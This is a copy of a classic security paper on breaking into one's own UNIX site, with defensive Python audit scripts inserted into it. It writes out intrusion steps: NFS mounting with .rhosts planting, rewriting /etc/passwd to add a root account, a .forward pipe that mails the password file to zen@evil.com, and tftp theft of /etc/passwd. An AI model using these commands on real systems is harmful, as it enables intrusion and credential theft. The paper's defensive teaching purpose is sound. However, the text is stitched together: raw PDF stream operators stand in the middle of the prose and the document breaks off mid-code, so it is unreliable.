Improving the Security of Your Site by Breaking Into it

Dan Farmer                              Wietse Venema
Sun Microsystems                        Eindhoven University of Technology
zen@sun.com                             wietse@wzv.win.tue.nl

http://www.deter.com/unix/papers/improve_by_breakin.html (22 pages), retrieved 2004-07-03 11:21:37


Introduction

Every day, all over the world, computer networks and hosts are being broken into. The level of sophistication of these attacks varies widely; while it is generally believed that most break-ins succeed due to weak passwords, there are still a large number of intrusions that use more advanced techniques to break in. Less is known about the latter types of break-ins, because by their very nature they are much harder to detect.

CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley. Purdue. Sun. You name it, we've seen it broken into. Anything that is on the Internet (and many that isn't) seems to be fairly easy game. Are these targets unusual? What happened?


Fade to...

A young boy, with greasy blonde hair, sitting in a dark room. The room is illuminated only by the luminescence of the C64's 40 character screen. Taking another long drag from his Benson and Hedges cigarette, the weary system cracker telnets to the next faceless ".mil" site on his hit list. "guest -- guest", "root -- root", and "system -- manager" all fail. No matter. He has all night... he pencils the host off of his list, and tiredly types in the next potential victim...

This seems to be the popular image of a system cracker. Young, inexperienced, and possessing vast quantities of time to waste, to get into just one more system. However, there is a far more dangerous type of system cracker out there. One who knows the ins and outs of the latest security auditing and cracking tools, who can modify them for specific attacks, and who can write his/her own programs. One who not only reads about the latest security holes, but also personally discovers bugs and vulnerabilities. A deadly creature that can both strike poisonously and hide its tracks without a whisper or hint of a trail. The uebercracker is here.

Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's uebermensch, or, literally translated into English, "over man." Nietzsche used the term not to refer to a comic book superman, but instead a man who had gone beyond the incompetence, pettiness, and weakness of the everyday man. The uebercracker is therefore the system cracker who has gone beyond simple cookbook methods of breaking into systems. An uebercracker is not usually motivated to perform random acts of violence. Targets are not arbitrary -- there is a purpose, whether it be personal monetary gain, a hit and run raid for information, or a challenge to strike a major or prestigious site or net.personality. An uebercracker is hard to detect, harder to stop, and hardest to keep out of your site for good.


Overview

In this paper we will take an unusual approach to system security. Instead of merely saying that something is a problem, we will look through the eyes of a potential intruder, and show _why_ it is one. We will illustrate that even seemingly harmless network services can become valuable tools in the search for weak points of a system, even when these services are operating exactly as they are intended to.

In an effort to shed some light on how more advanced intrusions occur, this paper outlines various mechanisms that crackers have actually used to obtain access to systems and, in addition, some techniques we either suspect intruders of using, or that we have used ourselves in tests or in friendly/authorized environments.

Our motivation for writing this paper is that system administrators are often unaware of the dangers presented by anything beyond the most trivial attacks. While it is widely known that the proper level of protection depends on what has to be protected, many sites appear to lack the resources to assess what level of host and network security is adequate. By showing what intruders can do to gain access to a remote site, we are trying to help system administrators to make _informed_ decisions on how to secure their site -- or not. We will limit the discussion to techniques that can give a remote intruder access to a (possibly non-interactive) shell process on a UNIX host. Once this is achieved, the details of obtaining root privilege are beyond the scope of this work -- we consider them too site-dependent and, in many cases, too trivial to merit much discussion.

We want to stress that we will not merely run down a list of bugs or security holes -- there will always be new ones for a potential attacker to exploit. The purpose of this paper is to try to get the reader to look at her or his system in a new way -- one that will hopefully afford him or her the opportunity to _understand_ how their system can be compromised, and how.

We would also like to reiterate to the reader that the purpose of this paper is to show you how to test the security of your own site, not how to break into other people's systems. The intrusion techniques we illustrate here will often leave traces in your system auditing logs -- it might be constructive to examine them after trying some of these attacks out, to see what a real attack might look like. Certainly other sites and system administrators will take a very dim view of your activities if you decide to use their hosts for security testing without advance authorization; indeed, it is quite possible that legal action may be pursued against you if they perceive it as an attack.

There are four main parts to the paper. The first part is the introduction and overview. The second part attempts to give the reader a feel for what it is like to be an intruder and how to go from knowing nothing about a system to compromising its security. This section goes over actual techniques to gain information and entrance and covers basic strategies such as exploiting trust and abusing improperly configured basic network services (ftp, mail, tftp, etc.). It also discusses slightly more advanced topics, such as NIS and NFS, as well as various common bugs and configuration problems that are somewhat more OS or system specific. Defensive strategies against each of the various attacks are also covered here.

The third section deals with trust: how the security of one system depends on the integrity of other systems. Trust is the most complex subject in this paper, and for the sake of brevity we will limit the discussion to clients in disguise.

The fourth section covers the basic steps that a system administrator may take to protect her or his system. Most of the methods presented here are merely common sense, but they are often ignored in practice -- one of our goals is to show just how dangerous it can be to ignore basic security practices.

Case studies, pointers to security-related information, and software are described in the appendices at the end of the paper.

While exploring the methods and strategies discussed in this paper we wrote SATAN (Security Analysis Tool for Auditing Networks). Written in shell, perl, expect and C, it examines a remote host or set of hosts and gathers as much information as possible by remotely probing NIS, finger, NFS, ftp and tftp, rexd, and other services. This information includes the presence of various network information services as well as potential security flaws -- usually in the form of incorrectly set up or configured network services, well-known bugs in system or network utilities, or poor or ignorant policy decisions. It then can either report on this data or use an expert system to further investigate any potential security problems. While SATAN doesn't use all of the methods that we discuss in the paper, it has succeeded with ominous regularity in finding serious holes in the security of Internet sites. It will be posted and made available via anonymous ftp when completed; Appendix A covers its salient features.

Note that it isn't possible to cover all possible methods of breaking into systems in a single paper. Indeed, we won't cover two of the most effective methods of breaking into hosts: social engineering and password cracking. The latter method is so effective, however, that several of the strategies presented here are geared towards acquiring password files. In addition, while windowing systems (X, OpenWindows, etc.) can provide a fertile ground for exploitation, we simply don't know many methods that are used to break into remote systems. Many system crackers use non-bitmapped terminals which can prevent them from using some of the more interesting methods to exploit windowing systems effectively (although being able to monitor the victim's keyboard is often sufficient to capture passwords). Finally, while worms, viruses, trojan horses, and other malware are very interesting, they are not common (on UNIX systems) and probably will use similar techniques to the ones we describe in this paper as individual parts to their attack strategy.


Gaining Information

Let us assume that you are the head system administrator of Victim Incorporated's network of UNIX workstations. In an effort to secure your machines, you ask a friendly system administrator from a nearby site (evil.com) to give you an account on one of her machines so that you can look at your own system's security from the outside.

What should you do? First, try to gather information about your (target) host. There is a wealth of network services to look at: finger, showmount, and rpcinfo are good starting points. But don't stop there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp, and as many other services as you can find. There are so many methods and techniques that space precludes us from showing all of them, but we will try to show a cross-section of the most common and/or dangerous strategies that we have seen or have thought of. Ideally, you would gather such information about all hosts on the subnet or area of attack -- information is power -- but for now we'll examine only our intended target.

To start out, you look at what the ubiquitous finger command shows you (assume it is 6pm, Nov 6, 1993):

    victim % finger @victim.com
    [victim.com]
    Login       Name               TTY Idle    When    Where
    zen      Dr. Fubar              co   1d Wed 08:00  death.com

Good! A single idle user -- it is likely that no one will notice if you actually manage to break in.

Now you try more tactics. As every finger devotee knows, fingering "@", "0", and "", as well as common names, such as root, bin, ftp, system, guest, demo, manager, etc., can reveal interesting information. What that information is depends on the version of finger that your target is running, but the most notable are account names, along with their home directories and the host that they last logged in from.

To add to this information, you can use rusers (in particular with the -l flag) to get useful information on logged-in users.

Trying these commands on victim.com reveals the following information, presented in a compressed tabular form to save space:

    Login   Home-dir      Shell      Last login, from where
    -----   --------      -----      ----------------------
    root    /             /bin/sh    Fri Nov  5 07:42 on ttyp1 from big.victim.com
    bin     /bin                     Never logged in
    nobody  /                        Tue Jun 15 08:57 on ttyp2 from server.victim.co
    daemon  /                        Tue Mar 23 12:14 on ttyp0 from big.victim.com
    sync    /             /bin/sync  Tue Mar 23 12:14 on ttyp0 from big.victim.com
    zen     /home/zen     /bin/bash  On since Wed Nov  6 on ttyp3 from death.com
    sam     /home/sam     /bin/csh   Wed Nov  5 05:33 on ttyp3 from evil.com
    guest   /export/foo   /bin/sh    Never logged in
    ftp     /home/ftp                Never logged in

Both our experiments with SATAN and watching system crackers at work have proved to us that finger is one of the most dangerous services, because it is so useful for investigating a potential target. However, much of this information is useful only when used in conjunction with other data.

For instance, running showmount on your target reveals:

    evil % showmount -e victim.com
    export list for victim.com:
    /export                                (everyone)
    /var                                   (everyone)
    /usr                                   easy
    /export/exec/kvm/sun4c.sunos.4.1.3     easy
    /export/root/easy                      easy
    /export/swap/easy                      easy

Note that /export/foo is exported to the world; also note that this is user guest's home directory. Time for your first break-in! In this case, you'll mount the home directory of user "guest." Since you don't have a corresponding account on the local machine and since root cannot modify files on an NFS mounted filesystem, you create a "guest" account in your local password file. As user guest you can put an .rhosts entry in the remote guest home directory, which will allow you to login to the target machine without having to supply a password.

    evil # mount victim.com:/export/foo /foo
    evil # cd /foo
    evil # ls -lag
    total 3
    1 drwxr-xr-x 11 root     daemon       512 Jun 19 09:47 .
    1 drwxr-xr-x  7 root     wheel        512 Jul 19  1991 ..
    1 drwx--x--x  9 10001    daemon      1024 Aug  3 15:49 guest
    evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
    evil # ls -lag
    total 3
    1 drwxr-xr-x 11 root     daemon       512 Jun 19 09:47 .
    1 drwxr-xr-x  7 root     wheel        512 Jul 19  1991 ..
    1 drwx--x--x  9 guest    daemon      1024 Aug  3 15:49 guest
    evil # su guest
    evil % echo victim.com >> guest/.rhosts
    evil % rlogin victim.com
    Welcome to victim.com!
    victim %

If, instead of home directories, victim.com were exporting filesystems with user commands (say, /usr or /usr/local/bin), you could replace a command with a trojan horse that executes any command of your choice. The next user to execute that command would execute your program.

We suggest that filesystems be exported:

    * Read/write only to specific, trusted clients.
    * Read-only, where possible (data or programs can often be exported in this manner.)
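As an added example (not code from the paper, SATAN or COPS), the following Python script does the showmount check above from the administrator's side: it parses `showmount -e` output, flags world exports, and reports which home directories from the password file are reachable through an export, as /export/foo is through /export here. The showmount and passwd lines are constructed from the sample target; the two-column showmount layout and the standard passwd field order are the only assumptions.

```python
"""Audit NFS exports from the defender's side: flag filesystems exported
to everyone, and home directories that live under an export.

Added example, not code from the paper, SATAN or COPS. Inputs below are
constructed from the paper's sample target.
"""
from dataclasses import dataclass
from posixpath import normpath

# Constructed input: the `showmount -e victim.com` output from the paper.
SHOWMOUNT_OUTPUT = """\
export list for victim.com:
/export                                (everyone)
/var                                   (everyone)
/usr                                   easy
/export/exec/kvm/sun4c.sunos.4.1.3     easy
/export/root/easy                      easy
/export/swap/easy                      easy
"""

# Constructed input: /etc/passwd lines matching the paper's finger table.
PASSWD_LINES = """\
root:x:0:1:Operator:/:/bin/sh
bin:x:3:3::/bin:
zen:x:1001:10:Dr. Fubar:/home/zen:/bin/bash
sam:x:1002:10:Sam:/home/sam:/bin/csh
guest:x:10001:1:Guest account:/export/foo:/bin/sh
ftp:x:101:1:Anonymous FTP:/home/ftp:
"""

WORLD = "(everyone)"   # how showmount marks an unrestricted export


@dataclass(frozen=True)
class Export:
    path: str
    clients: tuple     # e.g. ("(everyone)",) or ("easy",)


def parse_showmount(text: str) -> list:
    """Parse `showmount -e` output into Export records, skipping the header."""
    exports = []
    for line in text.splitlines():
        if not line.startswith("/"):
            continue   # "export list for ..." header or blank line
        path, *clients = line.split()
        exports.append(Export(normpath(path), tuple(clients)))
    return exports


def covering_export(path: str, exports: list):
    """Return the export whose mount point is the longest prefix of `path`.

    NFS hands out the filesystem containing the path, so /export/foo is
    reachable through an export of /export even though it is not listed.
    """
    path = normpath(path)
    best = None
    for exp in exports:
        if path == exp.path or path.startswith(exp.path.rstrip("/") + "/"):
            if best is None or len(exp.path) > len(best.path):
                best = exp
    return best


def audit(showmount_text: str, passwd_text: str) -> list:
    """Return findings: world exports first, then exposed home directories."""
    exports = parse_showmount(showmount_text)
    findings = []
    for exp in exports:
        if WORLD in exp.clients:
            findings.append(f"WORLD-EXPORT {exp.path}: exported to everyone")
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 6:
            continue   # not a passwd record
        user, home = fields[0], fields[5]
        exp = covering_export(home, exports)
        if exp is None:
            continue   # home directory is not reachable over NFS
        world = WORLD in exp.clients
        who = "everyone" if world else ",".join(exp.clients)
        sev = "HOME-WORLD" if world else "HOME-EXPORT"
        findings.append(f"{sev} {user}: home {home} reachable via export {exp.path} ({who})")
    return findings


if __name__ == "__main__":
    for finding in audit(SHOWMOUNT_OUTPUT, PASSWD_LINES):
        print(finding)
```

On the sample target this reports /export and /var as world exports and the guest home directory as reachable by everyone, which is exactly the entry point the walk-through uses.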
If the target has a "+" wildcard in its /etc/hosts.equiv (the default in various vendors' machines) or has the netgroups bug (CERT advisory 91:12), any non-root user with a login name in the target's password file can rlogin to the target without a password. And since the user "bin" often owns key files and directories, your next attack is to try to log in to the target host and modify the password file to let you have root access:

    evil % whoami
    bin
    evil % rsh victim.com csh -i
    Warning: no access to tty; thus no job control in this shell...
    victim % ls -ldg /etc
    drwxr-sr-x  8 bin      staff        2048 Jul 24 18:02 /etc
    victim % cd /etc
    victim % mv passwd pw.old
    victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
    victim % ^D
    evil % rlogin victim.com -l toor
    Welcome to victim.com!
    victim #

A few notes about the method used above; "rsh victim.com csh -i" is used to initially get onto the system because it doesn't leave any traces in the wtmp or utmp system auditing files, making the rsh invisible for finger and who. The remote shell isn't attached to a pseudo-terminal, however, so that screen-oriented programs such as pagers and editors will fail -- but it is very handy for brief exploration.

The COPS security auditing tool (see appendix D) will report key files or directories that are writable to accounts other than the superuser. If you run SunOS 4.x you can apply patch 100103 to fix most file permission problems. On many systems, rsh probes as shown above, even when successful, would remain completely unnoticed; the tcp wrapper (appendix D), which logs incoming connections, can help to expose such activities.
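An added detection example, not code from the paper or from the tcp_wrappers package: it scans tcp wrapper syslog lines for accepted rsh/rlogin/rexec connections from hosts outside a trusted list, since those sessions leave nothing in wtmp or utmp and the wrapper's log line is often the only trace. The log lines are constructed, and the `daemon[pid]: connect from host` layout is an assumption about how tcpd logs a connection.

```python
"""Find the "invisible" r-service sessions from the paper in tcp wrapper
logs: accepted rsh/rlogin/rexec connections from untrusted hosts.

Added example, not from the paper or tcp_wrappers. Sample lines are
constructed; the "daemon[pid]: connect from host" format is assumed.
"""
import re
from collections import Counter

# Constructed sample syslog lines in the assumed tcpd layout.
SAMPLE_LOG = """\
Nov  6 18:02:11 victim in.rshd[2231]: connect from evil.com
Nov  6 18:02:40 victim in.rlogind[2235]: connect from evil.com
Nov  6 18:03:05 victim in.fingerd[2240]: connect from evil.com
Nov  6 18:10:12 victim in.rlogind[2251]: connect from big.victim.com
Nov  6 18:11:47 victim in.ftpd[2260]: connect from death.com
Nov  6 18:12:30 victim in.rshd[2262]: refused connect from evil.com
Nov  6 18:15:00 victim sendmail[2270]: NOQUEUE: connect from death.com
"""

# Constructed trust list: the hosts a hosts.equiv without "+" would name.
TRUSTED_HOSTS = {"big.victim.com", "server.victim.com"}

# Wrapped daemons whose sessions bypass wtmp/utmp (names as in inetd.conf).
R_SERVICES = {"in.rshd", "in.rlogind", "in.rexecd"}

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<daemon>[\w.]+)\[\d+\]: (?P<refused>refused )?connect from (?P<client>\S+)$"
)


def parse_line(line: str):
    """Return a dict for a tcpd-style connect line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None   # sendmail and other daemons log differently; ignore
    rec = m.groupdict()
    rec["refused"] = rec["refused"] is not None
    return rec


def suspicious_rservice_connects(log_text: str, trusted=TRUSTED_HOSTS) -> list:
    """(timestamp, daemon, client) for accepted r-service connects from untrusted hosts."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["refused"]:
            continue   # unparsable, or already denied by the wrapper
        if rec["daemon"] in R_SERVICES and rec["client"] not in trusted:
            hits.append((rec["ts"], rec["daemon"], rec["client"]))
    return hits


def connects_per_client(log_text: str) -> Counter:
    """Accepted connections per client host, across all wrapped services."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and not rec["refused"]:
            counts[rec["client"]] += 1
    return counts


if __name__ == "__main__":
    for ts, daemon, client in suspicious_rservice_connects(SAMPLE_LOG):
        print(f"{ts} {daemon}: accepted r-service connection from untrusted {client}")
    print(dict(connects_per_client(SAMPLE_LOG)))
```

The per-client count pairs the r-service hits with the finger and ftp probes from the same host, which is the reconnaissance pattern the paper walks through.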
What now? Have you uncovered all the holes on your target system? Not by a long shot. Going back to the finger results on your target, you notice that it has an "ftp" account, which usually means that anonymous ftp is enabled. Anonymous ftp can be an easy way to get access, as it is often misconfigured. For example, the target may have a complete copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory instead of a stripped down version. In this example, though, you see that the latter doesn't seem to be true (how can you tell without actually examining the file?). However, the home directory of ftp on victim.com is writable. This allows you to remotely execute a command -- in this case, mailing the password file back to yourself -- by the simple method of creating a .forward file that executes a command when mail is sent to the ftp account. This is the same mechanism of piping mail to a program that the "vacation" program uses to automatically reply to mail messages.

    evil % cat forward_sucker_file
    "|/bin/mail zen@evil.com < /etc/passwd"

    evil % ftp victim.com
    Connected to victim.com
    220 victim FTP server ready.
    Name (victim.com:zen): ftp
    331 Guest login ok, send ident as password.
    Password:
    230 Guest login ok, access restrictions apply.
    ftp> ls -lga
    200 PORT command successful.
    150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
    total 5
    drwxr-xr-x  4 101      1            512 Jun 20  1991 .
    drwxr-xr-x  4 101      1            512 Jun 20  1991 ..
    drwxr-xr-x  2 0        1            512 Jun 20  1991 bin
    drwxr-xr-x  2 0        1            512 Jun 20  1991 etc
    drwxr-xr-x  3 101      1            512 Aug 22  1991 pub
    226 ASCII Transfer complete.
    242 bytes received in 0.066 seconds (3.6 Kbytes/s)
    ftp> put forward_sucker_file .forward
    43 bytes sent in 0.0015 seconds (28 Kbytes/s)
    ftp> quit
    evil % echo test | mail ftp@victim.com

Now you simply wait for the password file to be sent back to you.

The security auditing tool COPS will check your anonymous ftp setup; see the man page for ftpd, the documentation/code for COPS, or CERT advisory 93:10 for information on how to set up anonymous ftp correctly. Vulnerabilities in ftp are often a matter of incorrect ownership or permissions of key files or directories. At the very least, make sure that ~ftp and all "system" directories and files below ~ftp are owned by root and are not writable by any user.
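The following added example (not code from the paper or COPS) turns the ~ftp advice into a check: it walks an anonymous ftp tree, or evaluates a list of (path, uid, mode) records, and flags anything owned by the ftp account or writable by group/others, treating ~ftp itself and bin and etc as system paths. The sample records are transcribed from the `ls -lga` listing above; uid 101 for the ftp account and the choice of bin and etc as the system directories are assumptions.

```python
"""Check an anonymous ftp area for the mistake the paper exploits: in the
sample listing ~ftp is owned by uid 101, the ftp account, so the
anonymous user can drop a .forward there whatever the mode bits say.

Added example, not the paper's or COPS' code. `collect` reads records
from a real tree with os.lstat; `evaluate` is pure, so it runs on the
constructed records below too.
"""
import os
import stat

# Constructed from the paper's `ls -lga` output: (path relative to ~ftp, uid, mode).
SAMPLE_RECORDS = [
    (".",   101, 0o40755),   # ~ftp itself, owned by the ftp account: the hole
    ("bin", 0,   0o40755),
    ("etc", 0,   0o40755),
    ("pub", 101, 0o40755),
]
FTP_UID = 101                 # assumed uid of the "ftp" account on the sample target
SYSTEM_DIRS = ("bin", "etc")  # assumed "system" directories below ~ftp


def collect(ftp_home: str) -> list:
    """Walk a real ~ftp tree and return (relpath, uid, mode) records."""
    records = []
    for dirpath, _dirnames, filenames in os.walk(ftp_home):
        for full in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            st = os.lstat(full)   # lstat: do not follow symlinks out of ~ftp
            records.append((os.path.relpath(full, ftp_home), st.st_uid, st.st_mode))
    return records


def is_system_path(rel: str) -> bool:
    """~ftp itself and everything under its bin/ and etc/ directories."""
    return rel == "." or rel.split("/", 1)[0] in SYSTEM_DIRS


def evaluate(records: list, ftp_uid: int) -> list:
    """Return findings as (severity, relpath, reason) tuples, in record order."""
    findings = []
    for rel, uid, mode in records:
        system = is_system_path(rel)
        if uid == ftp_uid:
            # The anonymous session runs as this uid, so it can write here
            # regardless of the mode bits; fatal for ~ftp, bin and etc.
            findings.append(("HIGH" if system else "MEDIUM", rel,
                             f"owned by the ftp account (uid {ftp_uid})"))
        elif mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(("HIGH" if system else "LOW", rel,
                             "writable by group or others"))
        if system and uid not in (0, ftp_uid):
            findings.append(("MEDIUM", rel,
                             f"system path not owned by root (uid {uid})"))
    return findings


if __name__ == "__main__":
    import sys
    # With a path argument, audit a real ~ftp; otherwise use the paper's listing.
    recs = collect(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_RECORDS
    for sev, rel, why in evaluate(recs, FTP_UID):
        print(f"{sev:6} ~ftp/{rel}: {why}")
```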
While looking at ftp, you can check for an older bug that was once widely exploited:

    % ftp -n
    ftp> open victim.com
    Connected to victim.com
    220 victim.com FTP server ready.
    ftp> quote user ftp
    331 Guest login ok, send ident as password.
    ftp> quote cwd ~root
    530 Please login with USER and PASS.
    ftp> quote pass ftp
    230 Guest login ok, access restrictions apply.
    ftp> ls -al / (or whatever)

If this works, you now are logged in as root, and able to modify the password file, or whatever you desire. If your system exhibits this bug, you should definitely get an update to your ftpd daemon, either from your vendor or (via anon ftp) from ftp.uu.net.

The wuarchive ftpd, a popular replacement ftp daemon put out by the Washington University in Saint Louis, had almost the same problem. If your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a more recent version.
139 0 obj 3738
endobj
140 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(Finally, there is a program vaguely similar to ftp -- tftp, or the trivi\
al file transfer program. This daemon )Tj
0 -1.2 TD
(doesn't require any password for authentication; if a host provides tftp\
without restricting the access )Tj
T*
(\(usually via some secure flag set in the inetd.conf file\), an attacker\
can read and write files anywhere on )Tj
T*
(the system. In the example, you get the remote password file and place i\
t in your local /tmp directory: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % tftp)Tj
0 -1.2 TD
( tftp> connect victim.com)Tj
T*
( tftp> get /etc/passwd /tmp/passwd.victim)Tj
T*
( tftp> quit)Tj
/T1_0 1 Tf
0 -2.55232 TD
(For security's sake, tftp should not be run; if tftp is necessary, use t\
he secure option/flag to restrict access )Tj
0 -1.2 TD
(to a directory that has no valuable information, or run it under the con\
trol of a chroot wrapper program. )Tj
ET
0.5 0.5 0.5 rg
10 532 m
10 534 l
602 534 l
601 533 l
11 533 l
11 533 l
h
f
0.875 0.875 0.875 rg
602 534 m
602 532 l
10 532 l
11 533 l
601 533 l
601 533 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 512.97552 Tm
(If none of the previous methods have worked, it is time to go on to more\
drastic measures. You have a )Tj
T*
(friend in rpcinfo, another very handy program, sometimes even more usefu\
l than finger. Many hosts run )Tj
T*
(RPC services that can be exploited; rpcinfo can talk to the portmapper a\
nd show you the way. It can tell )Tj
T*
(you if the host is running NIS, if it is a NIS server or slave, if a dis\
kless workstation is around, if it is )Tj
T*
(running NFS, any of the info services \(rusersd, rstatd, etc.\), or any \
other unusual programs \(auditing or )Tj
T*
(security related\). For instance, going back to our sample target: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % rpcinfo -p victim.com [output trimmed for brevity's sake])Tj
0 -1.2 TD
( program vers proto port)Tj
T*
( 100004 2 tcp 673 ypserv)Tj
T*
( 100005 1 udp 721 mountd)Tj
T*
( 100003 2 udp 2049 nfs)Tj
T*
( 100026 1 udp 733 bootparam)Tj
T*
( 100017 1 tcp 1274 rexd)Tj
/T1_0 1 Tf
0 -2.55232 TD
(In this case, you can see several significant facts about our target; fi\
rst of which is that it is an NIS )Tj
0 -1.2 TD
(server. It is perhaps not widely known, but once you know the NIS domain\
name of a server, you can get )Tj
T*
(any of its NIS maps by a simple rpc query, even when you are outside the\
subnet served by the NIS )Tj
T*
(server \(for example, using the YPX program that can be found in the com\
p.sources.misc archives on ftp.)Tj
T*
(uu.net\). In addition, very much like easily guessed passwords, many sys\
tems use easily guessed NIS )Tj
T*
(domainnames. Trying to guess the NIS domainname is often very fruitful. \
Good candidates are the fully )Tj
T*
(and partially qualified hostname \(e.g. "victim" and "victim.com"\), the\
organization name, netgroup )Tj
T*
(names in "showmount" output, and so on. If you wanted to guess that the \
domainname was "victim", )Tj
T*
(you could type: )Tj
/T1_1 1 Tf
0 -2.56195 TD
( evil % ypwhich -d victim victim.com)Tj
0 -1.2 TD
( Domain victim not bound.)Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(9 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
141 0 obj 3840
endobj
142 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(This was an unsuccessful attempt; if you had guessed correctly it would \
have returned with the host )Tj
0 -1.2 TD
(name of victim.com's NIS server. However, note from the NFS section that\
victim.com is exporting the )Tj
T*
("/var" directory to the world. All that is needed is to mount this direc\
tory and look in the "yp" )Tj
T*
(subdirectory -- among other things you will see another subdirectory tha\
t contains the domainname of )Tj
T*
(the target. )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil # mount victim.com:/var /foo)Tj
0 -1.2 TD
( evil # cd /foo)Tj
T*
( evil # /bin/ls -alg /foo/yp)Tj
T*
( total 17)Tj
T*
( 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .)Tj
T*
( 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..)Tj
T*
( 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile)Tj
T*
( 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding)Tj
T*
( 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar)Tj
T*
( [...])Tj
/T1_0 1 Tf
0 -2.55232 TD
(In this case, "foo_bar" is the NIS domain name. )Tj
0 -2.55714 TD
(In addition, the NIS maps often contain a good list of user/employee nam\
es as well as internal host lists, )Tj
0 -1.2 TD
(not to mention passwords for cracking. )Tj
0 -2.55714 TD
(Appendix C details the results of a case study on NIS password files. )Tj
ET
0.5 0.5 0.5 rg
10 342.80002 m
10 344.80002 l
602 344.80002 l
601 343.80002 l
11 343.80002 l
11 343.80002 l
h
f
0.875 0.875 0.875 rg
602 344.80002 m
602 342.80002 l
10 342.80002 l
11 343.80002 l
601 343.80002 l
601 343.80002 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 323.77554 Tm
(You note that the rpcinfo output also showed that victim.com runs rexd. \
Like the rsh daemon, rexd )Tj
0 -1.2 TD
(processes requests of the form "please execute this command as that user\
". Unlike rshd, however, rexd )Tj
T*
(does not care if the client host is in the hosts.equiv or .rhost files. \
Normally the rexd client program is )Tj
T*
(the "on" command, but it only takes a short C program to send arbitrary \
client host and userid )Tj
T*
(information to the rexd server; rexd will happily execute the command. F\
or these reasons, running rexd )Tj
T*
(is similar to having no passwords at all: all security is in the client,\
not in the server where it should be. )Tj
T*
(Rexd security can be improved somewhat by using secure RPC. )Tj
ET
0.5 0.5 0.5 rg
10 190.2 m
10 192.2 l
602 192.2 l
601 191.2 l
11 191.2 l
11 191.2 l
h
f
0.875 0.875 0.875 rg
602 192.2 m
602 190.2 l
10 190.2 l
11 191.2 l
601 191.2 l
601 191.2 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 171.17555 Tm
(While looking at the output from rpcinfo, you observe that victim.com al\
so seems to be a server for )Tj
T*
(diskless workstations. This is evidenced by the presence of the bootpara\
m service, which provides )Tj
T*
(information to the diskless clients for booting. If you ask nicely, usin\
g )Tj
T*
(BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get it\
s NIS domainname. )Tj
T*
(This can be very useful when combined with the fact that you can get arb\
itrary NIS maps \(such as the )Tj
T*
(password file\) when you know the NIS domainname. Here is a sample code \
snippet to do just that )Tj
T*
(\(bootparam is part of SATAN.\) )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
143 0 obj 3507
endobj
144 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 753.90814 Tm
( char *server;)Tj
0 -1.2 TD
( struct bp_whoami_arg arg; /* query */)Tj
T*
( struct bp_whoami_res res; /* reply */)Tj
T*
( )Tj
T*
( /* initializations omitted... */)Tj
T*
( )Tj
T*
( callrpc\(server, BOOTPARAMPROG, BOOTPARAMVERS, )Tj
T*
(BOOTPARAMPROC_WHOAMI,)Tj
T*
( xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res\);)Tj
0 -2.39999 TD
( printf\("%s has nisdomain %s\\n", server, res.domain_name\);)Tj
/T1_0 1 Tf
0 -2.55232 TD
(The showmount output indicated that "easy" is a diskless client of victi\
m.com, so we use its client )Tj
0 -1.2 TD
(address in the BOOTPARAMPROC_WHOAMI query: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % bootparam victim.com easy.victim.com)Tj
0 -1.2 TD
( victim.com has nisdomain foo_bar)Tj
ET
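The following is an added example, not part of the paper or of SATAN: a small Python parser for the rpcinfo -p table shown above, with a table of the risk notes the paper attaches to each registered service (NIS server, NFS, diskless-client service, rexd). The notes are this example's summary of the text; the program numbers are the ones in the listing.

```python
import re

# Risk notes for RPC service names seen in rpcinfo -p output. This mapping is
# the example's own summary of the paper's observations, not a tool from it.
RISK_NOTES = {
    "ypserv":    "NIS server: maps (including passwd) readable by anyone who learns the domainname",
    "ypbind":    "NIS client: binds to whichever server answers for its domain",
    "mountd":    "NFS export list available via showmount; check for world exports",
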